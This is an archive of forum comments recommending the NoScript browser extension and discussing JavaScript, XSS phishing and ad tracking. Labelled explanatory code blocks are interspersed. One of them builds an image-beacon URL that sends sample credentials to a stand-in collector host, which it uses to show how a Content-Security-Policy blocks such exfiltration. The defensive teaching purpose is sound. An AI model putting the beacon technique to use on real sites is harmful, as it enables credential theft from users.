Domain: noscript.net
Stories and comments across the archive that link to noscript.net.
Comments · 347
-
Disabling JavaScript For Starters
Very well said!
XSS-based phishing, as reported in this other PERFECT PHISHING comment, can evade any current antiphishing tool.
Pasting the link and/or looking at the host won't help either, as the landing site is the original, legitimate one. You would need to be a programmer analyzing the whole URL very deeply, even if that example has not been obfuscated, for educational purposes, I guess.
It's detected and blocked by the NoScript Firefox extension, provided that it's opened from email or from an untrusted site, but that's another story (or just the same?)
The scary part is that if you've got automatic completion enabled for the login form, you don't even need to type anything, and your account is already stolen...
JavaScript is dangerous, and incompetent developers make it worse
:( -
NoScript is memory-friendly!
Toby, care to tell me where you got this info about leaks?
A "leak on window closure" regression appeared in NoScript 1.1.4.6.070322 (an "unofficial" development build) and was fixed 3 days later.
Since then I keep Leak Monitor in my development profile, even if it's a pain because of Firebug's and Venkman's leaks...
;) Later NoScript versions are completely leak-free (see the changelog).
-
Doesn't work (stupid javascript)
Reuters uses javascript to refresh and refresh blocker only nukes the META tag type of refreshing. The combination of refresh blocker and noscript does the trick here.
-
Re:The real problem
I've said it before, I'll say it again: we went through the same thing with Windows 95+ and Outlook.
Masses: "Ooooo look at the shiny features!"
tiny voice in the distance: "But it's a security nightmare!"
Masses (louder): "Ooooo look at the shiny features!"
I don't think any of these technologies are inherently any worse than any other method, but the problem is that they don't understand the technologies well enough, and aren't testing for vulnerabilities.
Unfortunately They are only part of the problem. It is currently impossible to secure Javascript for reasons that exist well beyond the individual web site.
The great hazard of client side scripting support (Javascript, Flash, Java, et al.) is that a breach of the sandbox in one domain can potentially hazard your interactions in other domains. So even if your site is 100% secured Javascript ensures your users can still be at risk. The only solution right now is for 100% of websites to be 100% invulnerable. Is that likely?
Personally I use Firefox with NoScript but while there may be instances where I can be reasonably sure a site I am visiting is not going to intentionally compromise me, there is no way to know that any site is 100% XSS proof. I know full well that every time I enable a site to use Javascript or Flash I increase my risk.
Make no mistake, there is a point at which things boil down to features vs. security. We all have a different threshold at which we are comfortable with the compromise.
-
NoScript helps
Normally, when a viewer hovers over a hyperlink, the name of the site that the computer user is about to access appears in the bottom left corner of the browser window. But hovering over Google's sponsored links shows nothing in that area. That blank space potentially gives bad guys another way to hide where visitors will be taken first.
Google is doing something bad here - disabling a browser security feature with JavaScript (why? - that was fashionable a decade ago...). Firefox users can install NoScript to prevent this kind of chicanery. I'm surprised Firefox doesn't have a preference to disable allowing JavaScript to do this in the first place.
(yes, that was a taunt for somebody to post the little-known about:config preference to disable this mis-feature) -
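The status-bar trick the comment above complains about works because an `onmouseover` handler may overwrite `window.status` (Firefox of that era exposed the `dom.disable_window_status_change` preference to refuse it), and a related trick swaps the `href` on `mousedown` so the link you hovered is not the one you follow. The block below is an added example, not code from the page or from NoScript: a small audit that flags both patterns in a page's anchors. The HTML is constructed for the demo, and the attribute scanner is a deliberately small regex pass over well-formed start tags, not a general HTML parser.

```javascript
// Added example: flag anchors that mask their real target.
// The sample markup is constructed; the scanner only understands
// well-formed name="value" / name='value' attributes.

const SAMPLE_HTML = `
<a href="https://www.example.com/">plain link</a>
<a href="https://ads.example/redir?to=42"
   onmouseover="window.status='https://www.example.com/'; return true"
   onmouseout="window.status=''">sponsored</a>
<a href="https://www.example.com/"
   onmousedown="this.href='https://tracker.example/click?u=42'">rewritten on click</a>
`;

// Extract name=value pairs from the body of one start tag.
function attributes(tagBody) {
  const out = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) out[m[1].toLowerCase()] = m[2] ?? m[3];
  return out;
}

// Returns [{ href, reasons[] }] for every anchor that hides or swaps its target.
function auditLinks(html) {
  const findings = [];
  const re = /<a\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const a = attributes(m[1]);
    const reasons = [];
    // Hover handlers that assign window.status hide the real URL from the status bar.
    const hover = `${a.onmouseover ?? ""} ${a.onmouseout ?? ""}`;
    if (/\bstatus\s*=/.test(hover)) reasons.push("status bar text overridden on hover");
    // Click handlers that rewrite href or drive window.location send you elsewhere.
    const click = `${a.onmousedown ?? ""} ${a.onclick ?? ""}`;
    if (/\bhref\s*=/.test(click) || /\blocation\b/.test(click)) reasons.push("target changed on click");
    if (reasons.length > 0) findings.push({ href: a.href ?? "", reasons });
  }
  return findings;
}

for (const f of auditLinks(SAMPLE_HTML)) console.log(f.href, "->", f.reasons.join("; "));
```

Run it with `node` on a saved copy of a page's HTML and review the flagged anchors by hand; an empty result says nothing about links built entirely by script after load, which this static pass cannot see.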
Re:Single parent of a 15 Year Old Daughter
Do not click the above link: it will hijack your browser with multiple sound clips, video clips, and... a lot of other unpleasantness. My Firefox crashed before it finished loading. NoScript is your friend!
-
Can I just say NoScript?
It seems I can.
99% of ads are javascript-based. You can always turn it on for trusted domains where you get some ajax-y benefit. -
Re:NoScript sometimes breaks DHTML
It was a glitch in dynamic inclusion of external scripts through the document.write("<script...></script>") hack used by some AJAX libraries (e.g. Scriptaculous on Digg). This was a rare problem under normal conditions, but NoScript filters used to make it appear more frequently.
Good news is that current NoScript 1.1.4.7 Release Candidate fixes this issue once (hopefully) for ever.
-
Executing 3rd party code by default is insecure?
Fortunately the web development community has learned so much from the ongoing ramifications of Microsoft's "features first, security later" approach in the 90's that we would never recreate such a mess. Oh wait - automatic, default execution of third party code on the client browser, INSIDE THE FIREWALL? What could possibly go wrong with that?
The arguments today also mirror what went on with Windows and Outlook in the 90's. A few wild haired prophets screaming doom and gloom but 99.9% of the IT community was/is hypnotized by the glamour of "features, features, features" and security is relegated to patching. Like building a submarine out of swiss cheese. You'll spend the rest of your life patching but if everyone does it, it's normal. A few weirdos will look up and say "why don't we just start with a less porous base material?" but they will be shouted down by the masses.
Javascript, Flash and Applets are insecure by concept. Oh, pardon me, sandboxes will take care of everything? Append an image to the DOM from your server. If that "image" is actually a program which reads the query string you can pass it any information you want. Sandbox jumped. Not a bug, a feature.
It's not enough to patch websites. It only takes one popular compromised site to infect thousands or even millions of users. Do I trust every site on the internet to be 100% invulnerable 24/7? Not really. Not even the sites I work on.
Most BANKS and financial services require Javascript to log in. Nice to know such critical web services are designed by people who "care about customer security." (cough, cough)
NoScript seems to be a reasonable compromise. No browser I'm aware of takes this approach by default.
-
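The "append an image from your server" channel in the comment above, and the XSS-plus-autocomplete credential theft described earlier on this page, rely on the same primitive: a script can encode anything it can read into the query string of an image request, and the browser fetches it. The block below is an added example, not code from the page or from NoScript. It shows the beacon construction and then a minimal Content-Security-Policy `img-src` evaluator that decides whether such a beacon would be allowed to load under a weak policy and under a tight one. The origins (bank.example, collector.invalid, cdn.example) are constructed; the evaluator omits path matching and the spec's http-to-https upgrade rule, and requires an explicit port in the URL when the pattern names one.

```javascript
// Added example: image-beacon exfiltration and the CSP img-src check that stops it.
// Origins below are constructed for the demo.

// Attacker side. In a page this is `new Image().src = buildBeaconUrl(...)`:
// the query string is the payload, the image bytes that come back are irrelevant.
function buildBeaconUrl(collectorOrigin, fields) {
  const qs = Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
  return `${collectorOrigin}/pixel.gif?${qs}`;
}

// Defender side: parse a CSP header into { directive: [source, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// "*.cdn.example" matches any subdomain of cdn.example but not cdn.example itself.
function hostMatches(pattern, host) {
  if (pattern.startsWith("*.")) {
    const suffix = pattern.slice(1);
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

// Does one source expression permit this URL? Handles *, 'none', 'self',
// scheme-source (data:, https:) and host-source with optional scheme and port.
function sourceAllows(source, url, pageOrigin) {
  const target = new URL(url);
  if (source === "*") return true;
  if (source === "'none'") return false;
  if (source === "'self'") return target.origin === new URL(pageOrigin).origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return target.protocol === source;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?/.exec(source);
  if (!m) return false;                       // keywords like 'unsafe-inline'
  const [, scheme, hostPattern, port] = m;
  if (scheme && target.protocol !== `${scheme}:`) return false;
  if (!hostMatches(hostPattern, target.hostname)) return false;
  if (port && port !== "*" && port !== target.port) return false;
  return true;
}

// img-src governs images; if absent, default-src applies; if neither is set the
// policy is silent and the load proceeds.
function imageAllowed(cspHeader, imageUrl, pageOrigin) {
  const policy = parseCsp(cspHeader);
  const sources = policy["img-src"] ?? policy["default-src"];
  if (sources === undefined) return true;
  return sources.some((s) => sourceAllows(s.toLowerCase(), imageUrl, pageOrigin));
}

// Demo: autofilled credentials leaving through a beacon under two policies.
const PAGE = "https://bank.example";
const beacon = buildBeaconUrl("https://collector.invalid", { u: "alice", p: "hunter2" });
const WEAK_CSP = "default-src 'self'; img-src *";
const TIGHT_CSP = "default-src 'self'; img-src 'self' https://*.cdn.example";
console.log(beacon);
console.log("weak policy allows beacon :", imageAllowed(WEAK_CSP, beacon, PAGE));
console.log("tight policy allows beacon:", imageAllowed(TIGHT_CSP, beacon, PAGE));
```

The point of the tight policy is that the sandbox boundary the comment says is "jumped" is a per-resource-type network policy the site can set; `img-src *` (common, because ad networks want it) reopens the channel. Note also that `connect-src` and `form-action` need the same treatment, since `fetch()` and a self-submitting form are equally good beacons.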
Javascript is the key
In TFA it says, "BrowserSpy delves even deeper into your system and even reports on whether you have certain software on your system, such as RealPlayer and Adobe Acrobat, including version information." Yet when I followed the link to this BrowserSpy thing, I found that much of the information it attempted to gather didn't work. It's all based on Javascript. While turning Javascript on and off all the time is a huge hassle, the NoScript extension for Firefox makes it much, MUCH easier. Since it also works based on the source of the Javascript, not the source of the web page you're viewing, sites which display web pages pulling data from elsewhere (e.g., a web store that pulls in Javascript code from a DoubleClick server) can still work, even if the undesired code is still disabled.
I had an argument with a friend of mine about this. He claimed "the web is Javascript." I disagree; most things seem to work just fine with Javascript selectively enabled instead of universally enabled. A few broken web sites is a low enough cost for the increased safety margin. -
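Several comments on this page describe the same policy model: scripts are blocked by default, the decision is keyed on the origin the script comes from rather than the page that embeds it, a site can be allowed temporarily (for the session) or permanently, and a domain such as googlesyndication.com can be kept blocked outright. The block below is an added example, not NoScript's code, implementing that decision function in plain JavaScript so the semantics are visible. All hostnames and list entries are constructed; the registrable-domain helper is a two-label approximation rather than a Public Suffix List lookup.

```javascript
// Added example: a default-deny script allow-list keyed on the script's origin.
// Hostnames and list contents are constructed for the demo.

function makePolicy() {
  return {
    permanent: new Set(["slashdot.org"]),        // survives browser restarts
    temporary: new Set(),                        // cleared at session end
    blocked: new Set(["googlesyndication.com"]), // explicit deny beats any allow
  };
}

// Registrable-domain approximation: the last two labels. A real implementation
// consults the Public Suffix List so that co.uk or github.io are handled.
function baseDomain(hostname) {
  const labels = hostname.toLowerCase().split(".").filter(Boolean);
  return labels.slice(-2).join(".");
}

// scriptUrl === null stands for an inline <script>, which runs as the page's
// own origin. Relative and protocol-relative URLs resolve against the page.
function decide(scriptUrl, pageUrl, policy) {
  const page = new URL(pageUrl);
  let src;
  try {
    src = scriptUrl === null ? page : new URL(scriptUrl, pageUrl);
  } catch {
    return { allow: false, reason: "unparseable script URL" };
  }
  if (src.protocol !== "http:" && src.protocol !== "https:") {
    // javascript:, data:, blob: carry no origin worth trusting.
    return { allow: false, reason: `scheme ${src.protocol} is never trusted` };
  }
  const domain = baseDomain(src.hostname);
  if (policy.blocked.has(domain)) return { allow: false, reason: `${domain} is explicitly blocked` };
  if (policy.permanent.has(domain)) return { allow: true, reason: `${domain} is on the permanent list` };
  if (policy.temporary.has(domain)) return { allow: true, reason: `${domain} is allowed for this session` };
  return { allow: false, reason: `${domain} is not listed (default deny)` };
}

function allowTemporarily(policy, hostname) { policy.temporary.add(baseDomain(hostname)); }
function allowPermanently(policy, hostname) { policy.permanent.add(baseDomain(hostname)); }
function endSession(policy) { policy.temporary.clear(); }

// Demo: a checkout page loading its own script plus two third-party tags.
const PAGE = "https://shop.example/checkout";
const demo = makePolicy();
const scripts = [
  "/static/cart.js",
  "https://pagead2.googlesyndication.com/show_ads.js",
  "https://ad.doubleclick.example/tag.js",
  "javascript:void(0)",
];
for (const s of scripts) console.log(s, "->", decide(s, PAGE, demo));
allowTemporarily(demo, "shop.example");
console.log("after temporary allow:", decide("/static/cart.js", PAGE, demo));
```

The part worth noticing is that allowing shop.example does nothing for the two tags: the page's own scripts run, the third-party ones stay blocked, which is exactly the "web store that pulls in code from a DoubleClick server" case in the comment above. The explicit-deny set is what makes "block googlesyndication.com" stick even if a later click would otherwise allow it.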
My must haves
Moji and Moji-en Japanese dictionary in Firefox.
ASpellFox My spelling sucks, before FF2.0 this was my best way to avoid misspelling 'the' every other post.
BugMeNot This really should be built into the browser now.
NoScript White list for javascript, everything is default blocked till you tell it otherwise.
User Agent Switcher Fun for masquerading as a Nintendo Wii, or any other browser.
Leet Key Ever been around a usenet group where ROT13ing Cisco was a safe way to not announce where you work at? Me either, but this has some fun uses.
Close Button I prefer the single 'close the current focused tab' button from FF 1.6
DOM Inspector and Web Developer If you either develop webpages, or visit really buggy ones, these can be very useful. -
Re:Bad month, but...
Yes, the codebase for Seamonkey will be slightly behind that for Firefox. I see that as a good thing, as it weeds out most of the x.0 type bugs, and makes Seamonkey a more mature product.
Mozilla and SeaMonkey are dead to me, if for no other reason than because you can't install extensions per-user, or as a non-root user.
http://noscript.net/faq#qa3_5
That's a huge show-stopping limitation, IMHO. -
NoScript :P
Obviously enough, NoScript users were immune from all these vulnerabilities, and from most of the yet to be discovered ones too
:P -
Life cycle of changes
Yes, peer review applies to the trunk as well.
The main difference is that new features and "risky" fixes (i.e. large patches with high regression danger) are almost never accepted in a branch, unless they answer an urgent security need.
Trunk, instead, is considered a playground for innovation, but changes are nevertheless bound to the same proposal/discussion/review/commit life cycle.
--
There's a browser safer than Firefox, it is Firefox, with NoScript. -
The exploit is a single line of JavaScript...
Still accepting candy from the strangers?
Default permit is the dumbest idea in security (well, default passwords can't even qualify as "ideas" ;) )
--
There's a browser safer than Firefox, it is Firefox, with NoScript. -
Re:mod up
More people need to stop running fascist websites that require javascript be on for simple text content...
How the USA is becoming a police state
Hey, turn on Javascript!
Yes, you!
Turn it on!
Ahh - noscript. -
Protected from "harm"?
We are pleased with the verdict and will continue to pursue criminal action against people who try to harm our members in any way.
Protect your members from the horrors of a harmless prank by helping get one of your members three years of probation, three months of community service, restitution payments to MySpace, a ban on using the Internet for personal purposes, and a tarnished CV.
I'd like to think that if someone managed to release a script onto /. that added everyone as their friend the admins would brush it off and take it as a joke. I don't think such a script would "harm" me. (I use FF's NoScript anyway, but that's besides the point..) -
Re:Why is it so hard?
I'd suggest No-Script http://noscript.net/ Its a Firefox Extension and as the name suggests, no scripts run unless you give the say so
:) -
It's the level of annoyance
I'll tolerate ads. They pay the bills, and I appreciate having the content available without having to pay an additional fee. The ads on
/. aren't bad, for example. But what drives me nuts are the Javascript ones with windows that float, move, or otherwise obscure the content beneath them. That's going too far. For those ones, I turn off Javascript (either manually or with Noscript) and reload the page. That kills them or forces the site to use a more reasonable advertising method.
I'm sorry, if advertisers are going to do the equivalent of waving a placard right in front of my face, then, yes, I'm going to tear it out of their hands and crush it. -
Re:I sense a disturbance in the force...
I tried the proof of concept with Firefox 2 and it FAILED for me. How? I use the NoScript extension. NoScript for the win once again, in case anyone still doubted its claim: There's a browser safer than Firefox... it is Firefox, with NoScript!
-
Requires javascript. Thumbs down.
It requires JavaScript so it gets a thumbs down from me. I have NoScript installed, so when I would search for something I got the home page over and over. No search results. No thanks.
-
There's a browser safer than Firefox...
... it is Firefox with NoScript
:) I wrote this Firefox add-on just after one of these disclosures, because the majority of the browser vulnerabilities were JavaScript-related, and the suggested work-around was always "turn off JavaScript".
Disabling JavaScript as a whole seemed quite impractical advice to me in this AJAXified Web 2.0: I thought that maintaining a white-list of trusted sites allowed to run JavaScript and keeping all the unknown web content "static" until I decided otherwise was a still-safe but more convenient approach.
Since then I've been browsing the web with my shields up (NoScript can also block Java, Flash and other plugins), but I allow on the fly with one click, either temporarily or permanently, those sites which I trust and which do need dynamic client-side technologies to work properly. To my surprise, in a year and a half I found few sites belonging to this category, because most places I usually browse are well designed enough to work with plain XHTML/CSS and nothing else (like Slashdot itself).
Notice: Firefox is a very safe browser because its vulnerabilities get patched very quickly, once they're found by developers. I'm a Firefox contributor myself, and I'm very proud of the quality of the Mozilla developers' community. NoScript, though, provides some extra protection even against those JavaScript/Java related vulnerabilities which have not been found yet...
-
Re:There's already an excellent firefox flash clie
I find it far more effective to use NoScript. Quoting from their site: While its primary aim is preventing malicious JavaScript from running, NoScript can effectively block Java(TM), Flash® and other plugins on untrusted sites.
However, ignoring all that. Flash 9 .. now I can finally use Digg Swarm/Stack .. yay! -
Re:Flashblock
Why not go all the way?
http://www.noscript.net/whats
Yes, it blocks Flash, Java, and other embedded crap as well as disabling Javascript, and has the same "click-to-activate" feature (plus per-site allow and temporary allow options), etc, etc.
Bleh, this sounds like an ad. I have nothing to do with NoScript, I'm just a very happy user...
Anonymousized just in case. -
Impossible to patch?
What about NoScript? http://www.noscript.net/whats
-
Re:o (British) bank should let....
OK, so it follows that the fewer places my bank details are, the less likely a direct debit could be set up to hoover my account. So by not using Paypal, by not even having an account (anymore), I cannot be phished, nor can PP be cracked (tech or social) and my details getting out.
Though my bank details may be visible to other ebay users I buy from, and by extension their accounts could be hacked and my details obtained by a crook, but this is pretty unlikely. But by the sounds of it the DD scheme is very protected and that's the only real "attack vector" if you have my sort code, name and a/c number.
But I found a file on my laptop earlier that I used as a notebook whilst I was constructing my rant to put in the box when closing the Paypal account I had (in error...). I feel I need to share this with the world, and you can give Paypal this amount of abuse and they don't do anything!
:) This chunk is over 2000 chars, but the 1000 character limit was enforced with javascript IIRC (can I get a shout-out to NoScript?). 1000 characters is not enough. Why place a limit? Can't Paypal take criticism? Or more likely those beloved shareholders are more important than your customers?
Paypal are greedy cunts, security is BS, you react in knee-jerk ways to sec issues (as long as paypal isn't ripped off, fraud isn't a problem from your point of view. So what if the customer get ripped off, what are they going to do, find another escrow service they can use on ebay?).
But fat-cat execs can't ever see what is wrong with their greed (and that attitude filters throughout an organisation. Do you have wanker middle-mgmt types that will fuck over the peons for personal gain (like bonuses or cars)?). I bet the person who reads this (first, but I doubt even if this gets escalated no-one will give a shit) is paid an insulting salary and hates their job, or at least the office politics etc..
At least in the UK you are regulated by the FSA, but elsewhere I understand you can do what you like, because you're not a bank and are so able to avoid any regulation.
PS It's trivial to bypass restrictions on a website, and only a retard would think that a JS limiter would be worth deploying into the production environment. But let me guess, the accountant types make the decisions, not the people who actually understand tech.
(though if there is half a clue anywhere in your organisation, you'll have post submit checks to force the-limits) (Wow, you do on the 3 tick box rule. I also want to tick:
No longer need / one time use
Bank account verification
PayPal's customer service was unprofessional
Fees are too high
Credit card verification
PayPal's products do not meet my needs)
I have entered the following into the "other" box, but it's over a number of characters so your shitty web site is choking:
Spam. I signed up for policy notifs & transaction emails, but I started getting shit about paypal by text, or someother system that is screaming out as a fraud vector, and you added me to a fucking mailing list without my consent.
And what the fuck? I have said to close this account multiple times, and I am repeatedly asked if I want to do something else. No, fucktards, I don't.
Yeah, it turned into a foaming rant
:) -
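The comment above makes a point that outlives the rant: a limit enforced only by browser-side JavaScript is advisory, because the request can be built without the browser's cooperation (NoScript, curl, a proxy), so the server has to apply the same rule to the raw submitted body. The block below is an added example, not PayPal's code: a server-side validator for a closure form with a free-text "other" field. The field names, reason codes and the 1000-character limit are assumed from the comment. It also handles the edge case a naive `.length` check gets wrong, counting user-visible characters (code points, after NFC normalisation) rather than UTF-16 units.

```javascript
// Added example: re-validate on the server what the client only pretended to enforce.
// Field names, reason codes and the limit are assumed for the demo.

const MAX_OTHER_CHARS = 1000;
const REASON_CODES = new Set([
  "no_longer_need", "bank_verification", "unprofessional_service",
  "fees_too_high", "cc_verification", "not_my_needs", "other",
]);

// Count code points, not UTF-16 units: "😀".length is 2 but it is one character,
// and "e" + combining acute is two code points until normalised to one.
function charCount(s) {
  return Array.from(s.normalize("NFC")).length;
}

// Validate a parsed closure form { reasons: string[], other: string } exactly as
// the server received it. Unknown reason codes are dropped rather than trusted.
function validateClosure(form) {
  const errors = [];
  const reasons = (Array.isArray(form.reasons) ? form.reasons : [])
    .filter((r) => REASON_CODES.has(r));
  if (reasons.length === 0) errors.push("pick at least one valid reason");

  const other = typeof form.other === "string" ? form.other : "";
  if (reasons.includes("other") && other.trim() === "") errors.push("'other' needs a description");
  const n = charCount(other);
  if (n > MAX_OTHER_CHARS) errors.push(`'other' is ${n} characters; the limit is ${MAX_OTHER_CHARS}`);

  return { ok: errors.length === 0, errors, reasons, other };
}

// Demo: the oversized text a browser-side maxlength would have stopped,
// submitted directly (curl, or JavaScript disabled) and caught here instead.
const rant = "Paypal, ".repeat(300); // 2400 characters
console.log(validateClosure({ reasons: ["other"], other: rant }));
console.log(validateClosure({ reasons: ["fees_too_high", "bogus"], other: "" }));
```

Whatever the browser's `maxlength` attribute or inline script says, this function is the only limit that counts; the client-side copy is there for the user's convenience, not for security.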
Re:Not so bleak
-
Re:Flashblock and Noscript
But NoScript can be configured to block Flash movies as well and behave like FlashBlock (i.e. enabling them on demand with one click): NoScript FAQ 1.3.
-
Re:Pretty clever..
Exactly. That's why I use NoScript... and everyone else should too! Get it and you'll eliminate all kinds of attacks.
-
NoScript Extension
Saved by NoScript again. If you're not using it, you really should; it can block exploits before anyone knows they exist! (Since they may require JavaScript, and this would block them. My statement is strictly true.)
-
Re:"Invents?"
Yeah, I was gonna say noscript: http://www.noscript.net/whats
-
Re:The differance
So what if Doubleclick (may they burn in Hell forever) knows that some guy visits Slashdot, ThinkGeek, and PennyArcade? I figure my privacy is fine as long as they cannot link the activity back to me personally.
The ignorance in this statement is so staggering that I had to respond and lose the moderations I've made on other posts to this story.
If you have any account online for which you have ever disclosed your true identity (like in order to make a purchase) then that account information can and will be cross-referenced with all of the tracking data that the tracking companies have been able to put together on you. They are exceptionally good at finding those information leaks and putting 1 and 1 and 1 and 1 together to make 4.
Don't be lulled into a false sense of security even if you are the type to disable cookies. Cookies are not the only way Doubleclick and the like track people. Embedded images, tags, 3rd party style sheets with god knows what javascript, ip address correlation, etc. The bag of tricks is practically bottomless.
I religiously use the following extensions to Firefox, with almost every site fully locked out, and even then I still leak personal information like a sieve:
NoScript
CookieSafe
AdBlock Plus -
Re:Torpark
Adsense what's that?
-
Re:Configure which sites get javascript?
Ah, but you can:
http://www.noscript.net/whats
Well... Where's the source code for that? I looked over the site pretty closely and couldn't find any links to the source. Maybe it is in the xpi but I shouldn't have to dig for it there. Also, the uninstall information was extremely lame and basically punted you elsewhere. -
Re:Configure which sites get javascript?
Ah, but you can:
http://www.noscript.net/whats
Completely blocked the "proof of concept" script here. -
NoScript extension could be a saviour
For about a year now I routinely install a whitelisting firefox extension called NoScript
It blocks javascript per-site until I choose to whitelist the site: Not only do I get a great deal fewer annoyances interrupting my browsing, but it also cuts out a lot of web advertising (the AdBlock extension makes my browser drag when fully loaded with filters) -
Re:Better cookie and JavaScript handling
The NoScript extension covers this for JavaScript (and Java, Flash, more) at least.
-
Re:Better cookie and JavaScript handling
For JavaScript, use NoScript: http://www.noscript.net/whats
-
Re:Encrypted?
If you use the NoScript extension (http://noscript.net/) and block googlesyndication.com, those tracking scripts can't execute.
-
Re:Actually, you missed number zero.
Two words for you.. NoScript Extension.
-
FF extensions and tor
I use some select FF extensions, and will soon be setting up a tor node, along with common sense.
The FF extensions I use are:
- NoScript (http://www.noscript.net/). I allow very few sites to run scripts, and the vast majority of sites work fine without JS. Even if JS is needed, it is easily enabled for good with noscript, or just for that browser session (and I use this feature more). Like flash and animated gifs, JS has been hijacked by marketers as a method to peddle their wares and they have spoilt it for everyone else. A fantastic side effect of running without JS is many sites use JS almost as a crude DRM.... There's some sites about that make you click an "I agree" button to download stuff, and often the EULA is in an HTML form textbox. The more stupid web devs protect the text of the EULA with JS to stop it being changed, even though text in boxes can be "readonly" just with HTML from 10 years ago.... then you agree to your new contract :)
- RefControl (http://www.stardrifter.org/refcontrol/). A referer blocker. I block all referers as it's simply a way to provide less info to a website. A website doesn't need to know where I have come from, and what will they do with that knowledge if they have it? Probably nothing that can harm me, but it could be useful for targeted adverts. Very few sites need referers to work, and they are mostly pr0n and warez/crack sites that use referers to stop leeching. That reminds me, must whitelist fosi again :)
- Adblock. (http://adblock.mozdev.org/). Everyone will be familiar with this. I use filterset.g too, and also add aggressive filters for sites that are blatantly tracking/trending domains. For example, one filter I have is http*.google-analytics.com/* . I have seen one tracking domain serving web bugs (those 1x1 images) by https, so my filters these days allow for that too...
- Extended Cookie Manager. (http://xcm.defector.de/). I basically accept all cookies on a session basis, and then whitelist the sites that need permanent cookies, or at least the sites I use that I trust not to track me (more than is necessary for the operation of the website), or that I don't want to have to log into every time.
If anyone can answer this I'd be chuffed though: Can FF be made to automatically try to use HTTPS for all surfing? For example, you type in a URL and it'll try the HTTPS site, you click on a link on a website and the browser will go to the https if it exists?.
As I said above I'm going to be setting up a tor node too on a spare machine, and will use this for searches and any communication with governmental sites, and sites where I may disclose personal info.
I can, if I want to, renew my car tax online for example. The UK government has demonstrated its obsession with data collection with the ID cards etc., and sooner or later they will realise really how powerful datamining is. I don't feel they need to ever be given my name/address and IP. If they ever want to determine users from IPs (eg IndyMedia servers) they can get a fucking court order and get the ISP to hand over the info. Even that's horrific, but there's not much I can directly do about that, apart from a Tor node. An extension for FF to automatically use a proxy for certain domains would be cool.
Of course common sense too protects your privacy. Always use fake details if registering for somewhere that doesn't need your details, and never use the same fake person at a bunch of sites, or even all the time. Make up names on the spot, or just munge keys. Some sites want valid info, or even check postal codes exist... We all know about 90210 for America, and the British postal code system can be abused too. I tend to use B1 1AA when a site wants a post code, or I'll go to their contact pages and find one there. Some sites are smart enough to not let
-
Re:Bad URL
you want NoScript... NOT adblock. NoScript blocks all Javascript crap by default and you can selectively temporarily-enable or whitelist stuff that you need.
-
Re:Bad URL
You can use NoScript. It automatically blocks all scripts, you can then whitelist (temporarily or forever) scripts on each website by the originating domain with a simple click. Also, it can prevent embedded WMP media from loading (for some people, disabled javascript + embedded WMV = crash).
http://www.noscript.net/whats -
Re:Bad URL
You want noscript. It's an addon. I'm using it under Seamonkey.
http://www.noscript.net/ -
Re:Bad URL
You could use noscript. http://www.noscript.net/whats/ It autoblocks ALL javascript then you opt in for one time or forever for each site.
-
Re:Problem with hosts...
And AdZap for squid was doing it before that. With roaming laptops and such, I found it easier to just install AdBlock which was much more effective.
With anti-adblocking code out there (along with javascript malware,) NoScript for FF is also a must. User Agent Switcher is also cool - make your browser look like a search engine such as googlebot... Can lead to interesting results on some sites.